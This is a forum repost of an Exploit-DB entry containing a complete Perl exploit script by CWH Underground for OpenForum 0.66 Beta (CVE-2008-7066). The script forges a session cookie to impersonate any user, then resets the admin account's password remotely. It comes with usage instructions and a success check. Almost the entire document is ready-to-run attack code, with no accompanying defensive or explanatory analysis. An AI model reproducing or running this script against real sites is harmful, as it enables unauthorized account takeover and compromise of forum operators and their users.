Exploit OpenForum 0.66 Beta - Remote Reset Admin Password

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7291
Проверка EDB
  1. Пройдено
Автор
CWH UNDERGROUND
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-7066
Дата публикации
2008-11-29
Код:
#!/usr/bin/perl -w
#========================================================
#OpenForum 0.66 Beta Remote Reset Admin Password Exploit
#========================================================
#
#  ,--^----------,--------,-----,-------^--,
#  |  |||||||||   `--------'    |	   O	  .. CWH Underground Hacking Team ..
#  `+---------------------------^----------|
#   `\_,-------, _________________________|
#      / XXXXXX /`|     /
#     / XXXXXX /  `\   /
#    / XXXXXX /\______(
#   / XXXXXX /           
#  / XXXXXX /
# (________(             
#  `------'
#
#AUTHOR : CWH Underground
#DATE : 29 November 2008
#SITE : cwh.citec.us
#
#
#####################################################
#APPLICATION : OpenForum
#VERSION : 0.66 Beta
#DOWNLOAD : http://downloads.sourceforge.net/openforum/openforum066.zip
######################################################
#######################################################################################
#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################

use LWP;
use HTTP::Request;
use HTTP::Request::Common;

print "\n==================================================\n";
print " Openforum 0.66 beta Remote Reset Admin Password exploit \n";
print " \n";
print " Discovered By CWH Underground \n";
print "==================================================\n";
print " \n";
print " ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
print " \n";

if ($#ARGV ne 2) {
	print "Usage: ./openforum.pl <url-to-index-page> <user account> <new password>\n";
	print "Ex. ./openforum.pl http://www.target.com/openforum/index.php admin cwhpass\n";
	exit();
}

$url = $ARGV[0];
$user = $ARGV[1];
$newpass = $ARGV[2];

if ($url !~ /^http:\/\//) {
	$url = "http://".$url;
}

print "[+] Target url: ".$url."\n\n";

$req = HTTP::Request->new (GET => $url);
$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
$req->header (Accept_Language => 'en-us,en;q=0.5');

$ua = LWP::UserAgent->new;
$response = $ua->request ($req);

if ($response->code ne 200) {
	print "Error: Could not request for index page\n";
	exit ();
}

$header = $response->headers->as_string;

($sessid) = $header =~ /sessid=(.+)\n/;
print ":: Retreive session id ::\n";
print "[+] ".$sessid."\n\n";

$url =~ s/index\.php$/profile.php?user=$user/;

#print $url;



$req = HTTP::Request->new (GET => $url);
$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
$req->header (Accept_Language => 'en-us,en;q=0.5');
$req->header (Cookie => 'sessid='.$sessid.'; userid='.$user);

$response = $ua->request ($req);
if ($response->code ne 200) {
	print "Error: Could not request for ".$user."'s profile page\n";
	exit ();
}

$content = $response->content;
$update = "1";
$adminaction = "";
($email) = $content =~ /\"email\" value=\"(.*?)\"/;
($signature) = $content =~ /\"signature\">(.*?)<\/textarea>/;
$day = "";
$month = "";
$year = "";
($website) = $content =~ /\"website\" value=\"(.*?)\"/;
($name) = $content =~ /\"name\" value=\"(.*?)\"/;
($phone) = $content =~ /\"phone\" value=\"(.*?)\"/;
($city) = $content =~ /\"city\" value=\"(.*?)\"/;
($location) = $content =~ /\"location\" value=\"(.*?)\"/;
$sytle = "";
$submit = "Update!";


print ":: Update new password ::\n\n";
$url =~ s/\?user=admin//;


$response = $ua->request (POST $url,
		User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18',
		Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
		Accept_Language => 'en-us,en;q=0.5',
		Cookie => 'sessid='.$sessid.'; userid='.$user,
		Content_Type => 'form-data',
		Content => [update => $update, user => $user, adminaction => '', email => $email, signature => $signature, website => $website, name => $name,
				phone => $phone, city => $city, location => $location, password => $newpass, submit => $submit]
);

if ($response->code ne 200) {
	print "Error: Could not request for profile page\n";
	exit ();
}

$content = $response->content;

if ($content =~ /<br>updated<br><table width=\"100%\">/) {
	print "[+] Exploit Success\n";
	print "[+] New admin's password: ".$newpass."\n";
}
else
{
	print "[+] Exploit Failed\n";
}

# milw0rm.com [2008-11-29]
 
Источник
www.exploit-db.com

Похожие темы